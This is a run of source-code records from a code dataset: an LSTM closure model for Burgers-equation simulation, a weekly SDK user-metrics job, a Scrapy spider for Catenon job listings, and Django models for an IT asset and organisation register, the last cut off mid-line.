xtrain , ytrain\n\n\n#%% Main program:\n \n# Inputs\nnx = 4*1024 #spatial resolution\nlx = 1.0 #spatial domain\ndx = lx/nx\nx = np.linspace(0, lx, nx+1)\n\nnu1 = 1e-2 #control dissipation\nnu2 = 1e-4 #control dissipation\ng1 = 0 #friction\ng2 = 1 #friction\n\ntm = 1 #maximum time\ndt = 2.5e-4 #solver timestep\nnt = round(tm/dt)\nt = np.linspace(0, tm, nt+1)\n\nns = 4000 #number of snapshots to save\nfreq = round(nt/ns)\n\n\ntraining = 'true'\n#%% Read data\nnpt = 3 #number of points in input\n\nuFOM = np.zeros((7,ns+1,nx+1))\nxi = np.zeros((7,ns+1,2*npt+1))\nyi = np.zeros((7,ns+1,1))\n\nfor ii in range(7):\n nxb= int((ii+1)*nx/8)\n data = np.load('./Data/uFOM_xb='+str(nxb/nx)+'_.npy')\n uFOM[ii,:,:] = data.T\n for jj in range(npt):\n xi[ii,:,jj] = data[nxb+jj,:].T\n xi[ii,:,npt+jj] = x[nxb+jj]\n \n xi[ii,:,-1] = t\n yi[ii,:,0] = data[nxb,:]\n\n#%% Divide into training and testing\n#uTrain = uFOM[[0,2,4,6],:,:]\n#uTest = uFOM[[1,3,5],:,:] \n\nxTrain = xi[[0,2,4,6],:,:]\nyTrain = yi[[0,2,4,6],:,:]\n\nlookback = 1\n#%%\nif training == 'true': \n \n for i in range(4):\n features = xTrain[i,:,:] \n labels = yTrain[i,:,:]\n xt, yt = create_training_data_lstm(features, labels, features.shape[0], \\\n features.shape[1], lookback)\n if i == 0:\n xtrain = xt\n ytrain = yt\n else:\n xtrain = np.vstack((xtrain,xt))\n ytrain = np.vstack((ytrain,yt))\n \n #%% \n # Scaling data\n m,n = ytrain.shape # m is number of training samples, n is number of output features\n scalerOut = MinMaxScaler(feature_range=(-1,1))\n scalerOut = scalerOut.fit(ytrain)\n ytrain = scalerOut.transform(ytrain)\n \n for k in range(lookback):\n if k == 0:\n tmp = xtrain[:,k,:]\n else:\n tmp = np.vstack([tmp,xtrain[:,k,:]])\n \n scalerIn = MinMaxScaler(feature_range=(-1,1))\n scalerIn = scalerIn.fit(tmp)\n for i in range(m):\n xtrain[i,:,:] = scalerIn.transform(xtrain[i,:,:])\n \n 
#%%\n # Shuffling data\n perm = np.random.permutation(m)\n xtrain = xtrain[perm,:,:]\n ytrain = ytrain[perm,:]\n \n # create folder\n if os.path.isdir(\"./LSTM Model\"):\n print('LSTM models folder already exists')\n else: \n print('Creating LSTM models folder')\n os.makedirs(\"./LSTM Model\")\n \n # Removing old models\n model_name = 'LSTM Model/LSTM_LP_'+str(npt)+'.h5'\n if os.path.isfile(model_name):\n os.remove(model_name)\n \n # create the LSTM architecture\n model = Sequential()\n model.add(LSTM(20, input_shape=(lookback, features.shape[1]), return_sequences=True, activation='tanh'))\n #model.add(LSTM(40, input_shape=(lookback, features.shape[1]), return_sequences=True, activation='tanh'))\n #model.add(LSTM(40, input_shape=(lookback, features.shape[1]), return_sequences=True, activation='tanh'))\n model.add(LSTM(20, input_shape=(lookback, features.shape[1]), activation='tanh'))\n model.add(Dense(labels.shape[1]))\n \n # compile model\n model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mse'])\n \n # run the model\n history = model.fit(xtrain, ytrain, epochs=200, batch_size=64, validation_split=0.25)\n \n # evaluate the model\n scores = model.evaluate(xtrain, ytrain, verbose=0)\n print(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\n \n loss = history.history['loss']\n val_loss = history.history['val_loss']\n \n plt.figure()\n epochs = range(1, len(loss) + 1)\n plt.semilogy(epochs, loss, 'b', label='Training loss')\n plt.semilogy(epochs, val_loss, 'r', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n filename = 'LSTM Model/LP_loss.png'\n plt.savefig(filename, dpi = 200)\n plt.show()\n \n \n # Save the model\n model.save(model_name)\n \n # Save the scales\n filename = 'LSTM Model/LP_input_scaler_'+str(npt)+'.save'\n joblib.dump(scalerIn,filename) \n filename = 'LSTM Model/LP_output_scaler_'+str(npt)+'.save'\n joblib.dump(scalerOut,filename) \n\n\n#%% Testing\nmodel_name = 'LSTM Model/LSTM_LP_'+str(npt)+'.h5'\nmodel = load_model(model_name) \n\n# load scales\nfilename = 'LSTM Model/LP_input_scaler_'+str(npt)+'.save'\nscalerIn = joblib.load(filename) \nfilename = 'LSTM Model/LP_output_scaler_'+str(npt)+'.save'\nscalerOut = joblib.load(filename) \n\nuLSTM = np.zeros((7,ns+1,nx+1))\n\nfor kk in range(7):\n nxb= int((kk+1)*nx/8)\n \n xTest = xi[kk,:,:]\n yTest = yi[kk,:,:]\n xtest = np.zeros((1,lookback,2*npt+1)) \n \n # Initializing\n uu = np.zeros(nx-nxb+1)\n uu[0] = 1.0\n u1 = np.zeros(nx-nxb+1)\n u1[0] = 1.0\n uLSTM[kk,0,nxb:] = uu\n for i in range(lookback):\n temp = xTest[i,:]\n temp = temp.reshape(1,-1)\n xtest[0,i,:] = scalerIn.transform(temp) \n \n # Prediction\n for i in range(lookback,ns+1):\n ytest = model.predict(xtest)\n ytest = scalerOut.inverse_transform(ytest) # rescale \n \n # integrate one time step || RK3 scheme\n # first step \n rr = rhsR(nx,dx,nu1,nu2,g1,g2,nxb,uu)\n u1[1:nx] = uu[1:nx] + dt*rr[1:nx]\n \n # second step\n rr = rhsR(nx,dx,nu1,nu2,g1,g2,nxb,u1)\n u1[1:nx] = 0.75*uu[1:nx] + 0.25*u1[1:nx] + 0.25*dt*rr[1:nx]\n \t\n # third step\n rr = rhsR(nx,dx,nu1,nu2,g1,g2,nxb,u1)\n uu[1:nx] = 1.0/3.0*uu[1:nx] + 2.0/3.0*u1[1:nx] + 2.0/3.0*dt*rr[1:nx]\n uu[0] = ytest\n u1[0] = ytest\n \n uLSTM[kk,i,nxb:] = uu\n print([kk,i])\n \n # Update xtest\n for k in range(lookback-1):\n xtest[0,k,:] = xtest[0,k+1,:]\n tmp = np.copy(xTest[i,:])\n tmp[0:npt] = uu[0:npt] \n tmp = tmp.reshape(1,-1)\n xtest[0,lookback-1,:] = scalerIn.transform(tmp) 
\n\nnp.save('./Data/uFOM.npy',uFOM)\nnp.save('./Data/uLP_'+str(npt)+'.npy',uLSTM)\n\n\n","sub_path":"1_1D Burgers [Ex1 and Ex2]/1_Right travelling wave [Ex1]/2_Burgers_Square_LP_closure.py","file_name":"2_Burgers_Square_LP_closure.py","file_ext":"py","file_size_in_byte":8263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"483545748","text":"# coding=utf-8\n\n# 周累计用户、付费信息统计\n# Author:liqianxi\n# Date:2015/03/10\n\nimport os\nimport logging\nimport datetime\n\nfrom pygodzilla.stream_handler import metrics\nfrom pygodzilla.context import Context\n\nfrom pipelines import *\n\n\nlogging.basicConfig(format='%(levelname)s %(asctime)-15s '\n '%(filename)s@%(funcName)s:%(message)s',\n level=logging.INFO)\n\nos.environ['HADOOP_USER_NAME'] = 'godzilla'\n\n\ndef week_days():\n return lambda x: (x,\n x + datetime.timedelta(days=1), x + datetime.timedelta(days=2), x + datetime.timedelta(days=3),\n x + datetime.timedelta(days=4), x + datetime.timedelta(days=5), x + datetime.timedelta(days=6))\n\n\nctx = Context(\"sdk\", {\n \"mongo_host\": \"10.0.0.57\",\n \"mongo_database\": \"godzilla\"\n})\n\n# 用户、设备(分应用)\nweekly_users_by_app_id = metrics('sdk', reg_or_login_events.with_date(week_days()),\n group_by='appId',\n rules=[\n ('__weekly_users_by_app_id', 'countDistinct(userId)'),\n ('__weekly_devices_by_app_id', 'countDistinct(deviceId)')\n ])\n\n# 活跃用户、活跃设备(分应用)\nweekly_active_users_by_app_id = metrics('sdk', login_events.with_date(week_days()),\n group_by=\"appId\",\n rules=[\n ('__weekly_active_users_by_app_id', 'countDistinct(userId)'),\n ('__weekly_active_devices_by_app_id', 'countDistinct(deviceId)')\n ])\n\n# 付费用户(分应用)\nweekly_pay_users_by_app_id = metrics('sdk', weekly_pay_users_amounts,\n group_by=\"appId\",\n rules=[\n ('__weekly_pay_users_by_app_id', 'countDistinct(userId)'),\n ('__weekly_pay_real_amount_by_app_id', 'sum(realAmount)')\n ])\n\n# 用户、设备\nweekly_users = metrics('sdk', reg_or_login_events.with_date(week_days()),\n rules=[\n ('__weekly_users', 'countDistinct(userId)'),\n ('__weekly_devices', 'countDistinct(deviceId)')\n ])\n\n# 活跃用户、活跃设备\nweekly_active_users = metrics('sdk', login_events.with_date(week_days()),\n rules=[\n ('__weekly_active_users', 'countDistinct(userId)'),\n ('__weekly_active_devices', 'countDistinct(deviceId)')\n ])\n\n# 付费用户\nweekly_pay_users = metrics('sdk', weekly_pay_users_amounts,\n rules=[\n ('__weekly_pay_users', 'countDistinct(userId)'),\n ('__weekly_pay_real_amount', 'sum(realAmount)')\n ])\n\nall_metrics = [\n weekly_users_by_app_id,\n weekly_active_users_by_app_id,\n weekly_pay_users_by_app_id,\n weekly_users,\n weekly_active_users,\n weekly_pay_users\n]\n\nctx.add_tasks(all_metrics)\n\nif __name__ == '__main__':\n ctx.run('weekly')\n","sub_path":"sdk/weekly.py","file_name":"weekly.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"359112179","text":"\"\"\"\nCatenon spider created on the top of ATSSpider\n\nscrapy crawl catenon -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://catenon.com/jobs\"\n\nSample URL:\n http://catenon.com/jobs\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\nfrom urllib import urlencode\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, Replace\n\npattern = {\n 'open_parenthesis': 
compile(r'([(])'),\n 'close_parenthesis': compile(r'([)])'),\n}\n\n\nclass Catenon(ATSSpider):\n\n name = 'catenon'\n # Taking table header and map to english headers\n mapping_table_headers = {\n 'Position': 'title',\n 'Location': 'location',\n 'Reference': 'ref_id',\n 'Sector': 'jobcategory',\n }\n logo_url = ''\n\n def parse(self, response):\n sel = Selector(response)\n logo_url = sel.xpath(\n '//div[contains(@class, \"logo\")]/a/img/@src'\n ).extract()\n if logo_url:\n self.logo_url = urljoin(\n response.url, logo_url[0].replace('..', '')\n )\n categories = sel.xpath(\n '//div/select[@id=\"areaSearchSelect\"]/option[not(position()=1)]/@value'\n ).extract()\n params = {\n 'idpais': '-1',\n 'idareaCrm': '-1',\n 'idpuestoCrm': '-1',\n 'keywords': '',\n }\n for cat_value in categories:\n params.update({'idareaCrm': str(cat_value)})\n yield Request(\n callback=self.parse_jobs_list,\n url=urljoin(\n response.url,\n '/jobs/search.action?%s' % urlencode(params)\n )\n )\n\n def parse_jobs_list(self, response):\n sel = Selector(response)\n\n table_header = sel.xpath(\n '//table[@id=\"jobs\"]/thead/tr/td/strong/text()'\n ).extract()\n meta_xpaths = {}\n for th in table_header:\n if th in self.mapping_table_headers:\n meta_xpaths[\n self.mapping_table_headers[th]\n ] = './td[%s]//text()' % str(table_header.index(th) + 1)\n for tr in sel.xpath(\n '//table[@id=\"jobs\"]/tbody/tr'\n ):\n job_url = tr.xpath('./td/a/@href').extract()\n if job_url:\n meta_data = {}\n for key, value in meta_xpaths.iteritems():\n meta_data[key] = tr.xpath(value).extract()\n yield Request(\n callback=self.parse_job_callback(),\n meta=meta_data,\n url=urljoin(response.url, job_url[0])\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_xpath(\n 'title',\n '//div[@id=\"detalle_oferta\"]/div/h3/text()'\n )\n if not loader.get_output_value('title'):\n loader.add_value(\n 'title', response.meta.get('title')\n )\n loader.add_value(\n 'location',\n response.meta.get('location'),\n Replace(pattern['open_parenthesis'], ', '),\n Replace(pattern['close_parenthesis'])\n )\n loader.add_value(\n 'referencenumber',\n response.meta.get('ref_id'),\n Prefix('%s-' % self.name)\n )\n loader.add_value('url', response.url)\n loader.add_xpath(\n 'description',\n [\n '//div/h3[contains(text(), \"Functions\")]',\n '//div/h3[contains(text(), \"Functions\")]/../following-sibling::ul[1]'\n ]\n )\n loader.add_xpath(\n 'requirements',\n [\n '//div/h3[contains(text(), \"Requirements\")]',\n '//div/h3[contains(text(), \"Requirements\")]/../following-sibling::ul[1]'\n ]\n )\n loader.add_value(\n 'jobcategory', response.meta.get('jobcategory')\n )\n loader.add_value(\n 'logo_url', self.logo_url\n )\n loader.add_value('apply_url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/catenon.py","file_name":"catenon.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"226769007","text":"from __future__ import unicode_literals, absolute_import\nfrom django.utils import timezone\nfrom django.utils.safestring import mark_safe\nfrom django.contrib.postgres.fields import JSONField\nfrom django.contrib.gis.db import models\n\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import timedelta, datetime\n\nfrom tracking import models as 
tracking\n\n\nCRITICALITY_CHOICES = (\n (1, 'Critical'),\n (2, 'Moderate'),\n (3, 'Low'),\n)\nIMPORTANCE_CHOICES = (\n (1, 'High'),\n (2, 'Medium'),\n (3, 'Low'),\n)\nDOC_STATUS_CHOICES = (\n (1, 'Draft'),\n (2, 'Released'),\n (3, 'Superseded'),\n)\n\n\nclass DocumentApproval(models.Model):\n \"\"\"A model to represent an approval/endorsement by a DepartmentUser for an\n uploaded file.\n \"\"\"\n department_user = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT)\n approval_role = models.CharField(\n max_length=256, blank=True, null=True,\n help_text='The role in which the user is approving the document.')\n evidence = models.FileField(\n blank=True, null=True, max_length=255, upload_to='uploads/%Y/%m/%d',\n help_text='Optional evidence to support the document approval (email, etc.)')\n date_created = models.DateTimeField(auto_now_add=True, editable=False)\n\n def __str__(self):\n if self.approval_role:\n return \"{}, {} ({})\".format(\n self.department_user, self.approval_role,\n datetime.strftime(self.date_created, '%d-%b-%Y'))\n else:\n return \"{} ({})\".format(\n self.department_user, datetime.strftime(self.date_created, '%d-%b-%Y'))\n\n\nclass Location(models.Model):\n name = models.CharField(max_length=256, unique=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n address = models.TextField(unique=True, blank=True)\n pobox = models.TextField(blank=True, verbose_name='PO Box')\n phone = models.CharField(max_length=128, null=True, blank=True)\n fax = models.CharField(max_length=128, null=True, blank=True)\n email = models.CharField(max_length=128, null=True, blank=True)\n point = models.PointField(null=True, blank=True)\n url = models.CharField(max_length=2000, help_text=\"URL to webpage with more information\", null=True, blank=True)\n bandwidth_url = models.CharField(max_length=2000, help_text=\"URL to prtg graph of bw utilisation\", null=True, blank=True)\n\n def __str__(self):\n return \"{} ({})\".format(self.name, self.address)\n\n def as_dict(self):\n return {k: getattr(self, k) for k in (\"name\", \"address\", \"pobox\", \"phone\", \"fax\", \"email\") if getattr(self, k)}\n\n def save(self, *args, **kwargs):\n for orgunit in self.orgunit_set.all():\n orgunit.save()\n super(Location, self).save(*args, **kwargs)\n\n class Meta:\n ordering = ('name',)\n\n\nclass SecondaryLocation(models.Model):\n location = models.ForeignKey(Location)\n name = models.CharField(max_length=256, unique=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n phone = models.CharField(max_length=128, null=True, blank=True)\n fax = models.CharField(max_length=128, null=True, blank=True)\n email = models.CharField(max_length=128, null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n def save(self, *args, **kwargs):\n for orgunit in self.orgunit_set.all():\n orgunit.save()\n super(SecondaryLocation, self).save(*args, **kwargs)\n\n def as_dict(self):\n return {k: getattr(self, k) for k in (\"name\", \"phone\", \"fax\", \"email\") if getattr(self, k)}\n\n\nclass OrgUnit(MPTTModel):\n TYPE_CHOICES = (\n (0, \"Department\"),\n (1, \"Division\"),\n (2, \"Branch\"),\n (3, \"Region\"),\n (4, \"Cost Centre\"),\n (5, \"Office\"),\n (6, \"District\"),\n (7, \"Section\"),\n )\n TYPE_CHOICES_DICT = dict(TYPE_CHOICES)\n unit_type = models.PositiveSmallIntegerField(choices=TYPE_CHOICES, default=4)\n ad_guid = models.CharField(max_length=48, unique=True, null=True, 
editable=False)\n ad_dn = models.CharField(max_length=512, unique=True, null=True, editable=False)\n name = models.CharField(max_length=256, unique=True)\n acronym = models.CharField(max_length=16, null=True, blank=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True)\n parent = TreeForeignKey('self', on_delete=models.PROTECT, null=True, blank=True, related_name='children', db_index=True)\n details = JSONField(null=True, blank=True)\n location = models.ForeignKey(Location, on_delete=models.PROTECT, null=True, blank=True)\n secondary_location = models.ForeignKey(SecondaryLocation, on_delete=models.PROTECT, null=True, blank=True)\n\n def cc(self):\n try:\n return self.costcentre\n except:\n return None\n\n def __str__(self):\n name = self.name\n if self.acronym:\n name = \"{} - {}\".format(self.acronym, name)\n if self.cc():\n return \"{} - CC{}\".format(name, self.cc())\n return name\n\n def members(self):\n from tracking.models import DepartmentUser\n return DepartmentUser.objects.filter(org_unit__in=self.get_descendants(include_self=True), **DepartmentUser.ACTIVE_FILTER)\n\n def save(self, *args, **kwargs):\n self.details = self.details or {}\n self.details.update({\n \"type\": self.get_unit_type_display(),\n })\n if self.secondary_location:\n self.location = self.secondary_location.location\n if not getattr(self, \"cheap_save\", False):\n for user in self.departmentuser_set.all():\n user.save()\n super(OrgUnit, self).save(*args, **kwargs)\n\n class MPTTMeta:\n order_insertion_by = ['name']\n\n class Meta:\n ordering = ('name',)\n\n\nclass CostCentre(models.Model):\n name = models.CharField(max_length=25, unique=True, editable=False)\n code = models.CharField(max_length=5, unique=True)\n division = models.ForeignKey(OrgUnit, null=True, editable=False, related_name=\"costcentres_in_division\")\n org_position = models.OneToOneField(OrgUnit, unique=True)\n manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"manage_ccs\", null=True, blank=True)\n business_manager = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"bmanage_ccs\", help_text=\"Business Manager\", null=True, blank=True)\n admin = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"admin_ccs\", help_text=\"Admin\", null=True, blank=True)\n tech_contact = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"tech_ccs\", help_text=\"Technical Contact\", null=True, blank=True)\n\n def save(self, *args, **kwargs):\n self.name = str(self)\n division = self.org_position.get_ancestors(include_self=True).filter(unit_type=1)\n if division:\n self.division = division.first()\n for user in self.departmentuser_set.all():\n user.save()\n super(CostCentre, self).save(*args, **kwargs)\n\n def __str__(self):\n name = '{}'.format(self.code)\n dept = self.org_position.get_ancestors(include_self=True).filter(unit_type=0)\n if dept:\n name += \" ({})\".format(dept.first().acronym)\n return name\n\n class Meta:\n ordering = ('code',)\n\n\nclass Software(models.Model):\n \"\"\"A model to represent a discrete unit of software (OS, runtime, etc.)\n \"\"\"\n name = models.CharField(max_length=2048, unique=True)\n url = models.CharField(max_length=2000, null=True, blank=True)\n license = models.ForeignKey('registers.SoftwareLicense', on_delete=models.PROTECT, null=True)\n os = models.BooleanField(default=False, verbose_name='OS', help_text='Software is an operating 
system?')\n\n class Meta:\n verbose_name_plural = 'software'\n\n def __str__(self):\n return self.name\n\n\nclass Hardware(tracking.CommonFields):\n device_type = models.PositiveSmallIntegerField(choices=(\n (1, 'Network'), (2, 'Mobile'), (3, 'Domain PC'), (4, 'Hostname')))\n computer = models.OneToOneField(tracking.Computer, null=True, editable=False)\n mobile = models.OneToOneField(tracking.Mobile, null=True, editable=False)\n username = models.CharField(max_length=128, null=True, editable=False)\n email = models.CharField(max_length=512, null=True, editable=False)\n ipv4 = models.TextField(default='', editable=False)\n ports = models.TextField(default='', editable=False)\n name = models.CharField(max_length=2048, unique=True, editable=False)\n serials = models.TextField(null=True, editable=False)\n local_info = models.TextField(null=True, editable=False)\n local_current = models.BooleanField(default=True, help_text='Does local state match central state?')\n os = models.ForeignKey(\n Software, on_delete=models.PROTECT, null=True, blank=True, limit_choices_to={'os': True},\n verbose_name='operating system')\n location = models.ForeignKey(Location, on_delete=models.PROTECT, null=True, blank=True, help_text='Physical location')\n\n def __str__(self):\n return '{}:{} ({})'.format(self.get_device_type_display(), self.name, self.cost_centre)\n\n class Meta:\n unique_together = ('computer', 'mobile')\n ordering = ('name', '-device_type')\n verbose_name_plural = 'hardware'\n\n\nclass Device(tracking.CommonFields):\n TYPE_CHOICES = (\n (0, \"Computer\"),\n (1, \"Mobile\"),\n (2, \"PRTG\"),\n )\n name = models.CharField(max_length=2048, unique=True)\n owner = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, related_name=\"devices_owned\")\n guid = models.CharField(max_length=48, unique=True, help_text=\"AD GUID (ad:...) or PRTG object id (prtg:...)\")\n device_type = models.PositiveSmallIntegerField(choices=TYPE_CHOICES, default=0)\n\n def __str__(self):\n return self.name\n\n\nclass UserGroup(models.Model):\n \"\"\"A model to represent an arbitrary group of users for an IT System.\n E.g. 
'All department staff', 'External govt agency staff', etc.\n \"\"\"\n name = models.CharField(max_length=2048, unique=True)\n user_count = models.PositiveIntegerField(blank=True, null=True)\n\n def __str__(self):\n return '{} ({})'.format(self.name, self.user_count)\n\n\nclass ITSystemHardware(models.Model):\n \"\"\"A model to represent the relationship between an IT System and a\n Hardware entity.\n \"\"\"\n ROLE_CHOICES = (\n (1, 'Application server'),\n (2, 'Database server'),\n (3, 'Network file storage'),\n (4, 'Reverse proxy'),\n )\n host = models.ForeignKey(Hardware, on_delete=models.PROTECT)\n role = models.PositiveSmallIntegerField(choices=ROLE_CHOICES)\n\n class Meta:\n verbose_name_plural = 'IT system hardware'\n unique_together = ('host', 'role')\n\n def __str__(self):\n return '{} ({})'.format(self.host.name, self.role)\n\n\nclass ITSystem(tracking.CommonFields):\n STATUS_CHOICES = (\n (0, \"Production\"),\n (1, \"Development\"),\n (2, \"Production (Legacy)\"),\n (3, \"Decommissioned\"),\n (4, \"Unknown\")\n )\n ACCESS_CHOICES = (\n (1, 'Public Internet'),\n (2, 'Authenticated Extranet'),\n (3, 'Corporate Network'),\n (4, 'Local System (Networked)'),\n (5, 'Local System (Standalone)')\n )\n AUTHENTICATION_CHOICES = (\n (1, 'Domain Credentials'),\n (2, 'Single Sign On'),\n (3, 'Externally Managed')\n )\n AVAILABILITY_CHOICES = (\n (1, '24 hours a day, 7 days a week, 365 days a year'),\n (2, 'Department core business hours'),\n )\n SYSTEM_TYPE_CHOICES = (\n (1, 'Web application'),\n (2, 'Client application'),\n (3, 'Mobile application'),\n (4, 'Service'),\n )\n name = models.CharField(max_length=128, unique=True)\n system_id = models.CharField(max_length=16, unique=True)\n acronym = models.CharField(max_length=16, null=True, blank=True)\n status = models.PositiveSmallIntegerField(choices=STATUS_CHOICES, default=4)\n status_display = models.CharField(max_length=128, null=True, editable=False)\n description = models.TextField(blank=True)\n devices = models.ManyToManyField(Device, blank=True)\n owner = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, related_name=\"systems_owned\", help_text=\"Application owner\")\n custodian = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, null=True, related_name=\"systems_custodianed\", help_text=\"Appication custodian\")\n data_custodian = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"systems_data_custodianed\", null=True, blank=True)\n preferred_contact = models.ForeignKey(tracking.DepartmentUser, on_delete=models.PROTECT, related_name=\"systems_preferred_contact\", null=True, blank=True)\n link = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to web application\")\n documentation = models.URLField(max_length=2048, null=True, blank=True, help_text=\"URL to end-user documentation\")\n technical_documentation = models.URLField(max_length=2048, null=True, blank=True, help_text=\"URL to technical documentation\")\n status_html = models.URLField(max_length=2048, null=True, blank=True, help_text=\"URL to status/uptime info\")\n authentication = models.PositiveSmallIntegerField(choices=AUTHENTICATION_CHOICES, default=1)\n authentication_display = models.CharField(max_length=128, null=True, editable=False)\n access = models.PositiveSmallIntegerField(choices=ACCESS_CHOICES, default=3)\n access_display = models.CharField(max_length=128, null=True, editable=False)\n request_access = models.TextField(blank=True)\n criticality = 
models.PositiveIntegerField(choices=CRITICALITY_CHOICES, null=True, blank=True)\n availability = models.PositiveIntegerField(choices=AVAILABILITY_CHOICES, null=True, blank=True, help_text='Expected availability for this IT System')\n schema_url = models.URLField(max_length=2048, null=True, blank=True, help_text='URL to schema diagram')\n user_groups = models.ManyToManyField(UserGroup, blank=True, help_text='User group(s) that use this IT System')\n softwares = models.ManyToManyField(Software, blank=True, help_text='Software that is used to provide this IT System')\n hardwares = models.ManyToManyField(ITSystemHardware, blank=True, help_text='Hardware that is used to provide this IT System')\n bh_support = models.ForeignKey(\n tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True, related_name=\"bh_support\",\n verbose_name='business hours support', help_text='Business hours support contact')\n ah_support = models.ForeignKey(\n tracking.DepartmentUser, on_delete=models.PROTECT, null=True, blank=True, related_name=\"ah_support\",\n verbose_name='after hours support', help_text='After-hours support contact')\n system_reqs = models.TextField(blank=True, help_text='A written description of the requirements to use the system (e.g. web browser version)')\n system_type = models.PositiveSmallIntegerField(choices=SYSTEM_TYPE_CHOICES, null=True, blank=True)\n vulnerability_docs = models.URLField(max_length=2048, null=True, blank=True, help_text='URL to documentation related to known vulnerability reports')\n workaround = models.TextField(blank=True, help_text='Written procedure for users to work around an outage of this system')\n recovery_docs = models.URLField(max_length=2048, null=True, blank=True, help_text='URL to recovery procedure(s) in the event of system failure')\n mtd = models.DurationField(help_text=\"Maximum Tolerable Downtime (days hh:mm:ss)\", default=timedelta(days=14))\n rto = models.DurationField(help_text=\"Recovery Time Objective (days hh:mm:ss)\", default=timedelta(days=7))\n rpo = models.DurationField(help_text=\"Recovery Point Objective/Data Loss Interval (days hh:mm:ss)\", default=timedelta(hours=24))\n contingency_plan = models.FileField(\n blank=True, null=True, max_length=255, upload_to='uploads/%Y/%m/%d',\n help_text='NOTE: changes to this field will delete current contingency plan approvals.')\n contingency_plan_status = models.PositiveIntegerField(\n choices=DOC_STATUS_CHOICES, null=True, blank=True)\n contingency_plan_approvals = models.ManyToManyField(DocumentApproval, blank=True)\n contingency_plan_last_tested = models.DateField(\n null=True, blank=True, help_text='Date that the plan was last tested.')\n\n def __init__(self, *args, **kwargs):\n super(ITSystem, self).__init__(*args, **kwargs)\n # Store the pre-save values of some fields on object init.\n self.__original_contingency_plan = self.contingency_plan\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = \"IT System\"\n ordering = ['name']\n\n def description_html(self):\n return mark_safe(self.description)\n\n def save(self, *args, **kwargs):\n if not self.system_id:\n self.system_id = \"S{0:03d}\".format(ITSystem.objects.order_by(\"-pk\").first().pk+1)\n self.status_display = self.get_status_display()\n self.authentication_display = self.get_authentication_display()\n if not self.link: # systems with no link default to device\n self.access = 4\n self.access_display = self.get_access_display()\n super(ITSystem, self).save(*args, **kwargs)\n\n\nclass 
Backup(tracking.CommonFields):\n ROLE_CHOICES = (\n (0, \"Generic Server\"),\n (1, \"Domain Controller\"),\n (2, \"Database Server\"),\n (3, \"Application Host\"),\n (4, \"Management Server\"),\n (5, \"Site Server\"),\n (6, \"File Server\"),\n (7, \"Print Server\"),\n (8, \"Block Storage Server\"),\n (9, \"Email Server\"),\n (10, \"Network Device\"))\n STATUS_CHOICES = (\n (0, \"Production\"),\n (1, \"Pre-Production\"),\n (2, \"Legacy\"),\n (3, \"Decommissioned\")\n )\n SCHEDULE_CHOICES = (\n (0, \"Manual\"),\n (1, \"Point in time, 7 day retention\"),\n (2, \"Daily, 7 day retention\"),\n (3, \"Daily, 30 day retention\"),\n (4, \"Weekly, 1 month retention\")\n )\n system = models.OneToOneField(Hardware)\n operating_system = models.CharField(max_length=120)\n parent_host = models.ForeignKey(Hardware, on_delete=models.PROTECT, null=True, blank=True, related_name=\"host\")\n role = models.PositiveSmallIntegerField(choices=ROLE_CHOICES, default=0)\n status = models.PositiveSmallIntegerField(choices=STATUS_CHOICES, default=0)\n database_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Database backup/restore/logs info\")\n database_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n filesystem_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Filesystem backup/restore/logs info\")\n filesystem_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n appdata_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Application Data backup/restore/logs info\")\n appdata_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n appconfig_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Config for App/Server\")\n appconfig_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n os_backup = models.CharField(max_length=2048, null=True, blank=True, help_text=\"URL to Build Documentation\")\n os_schedule = models.PositiveSmallIntegerField(choices=SCHEDULE_CHOICES, default=0)\n last_tested = models.DateField(null=True, blank=True, help_text=\"Last tested date\")\n test_schedule = models.PositiveSmallIntegerField(default=12, help_text=\"Test Schedule in Months, 0 for never\")\n comment = 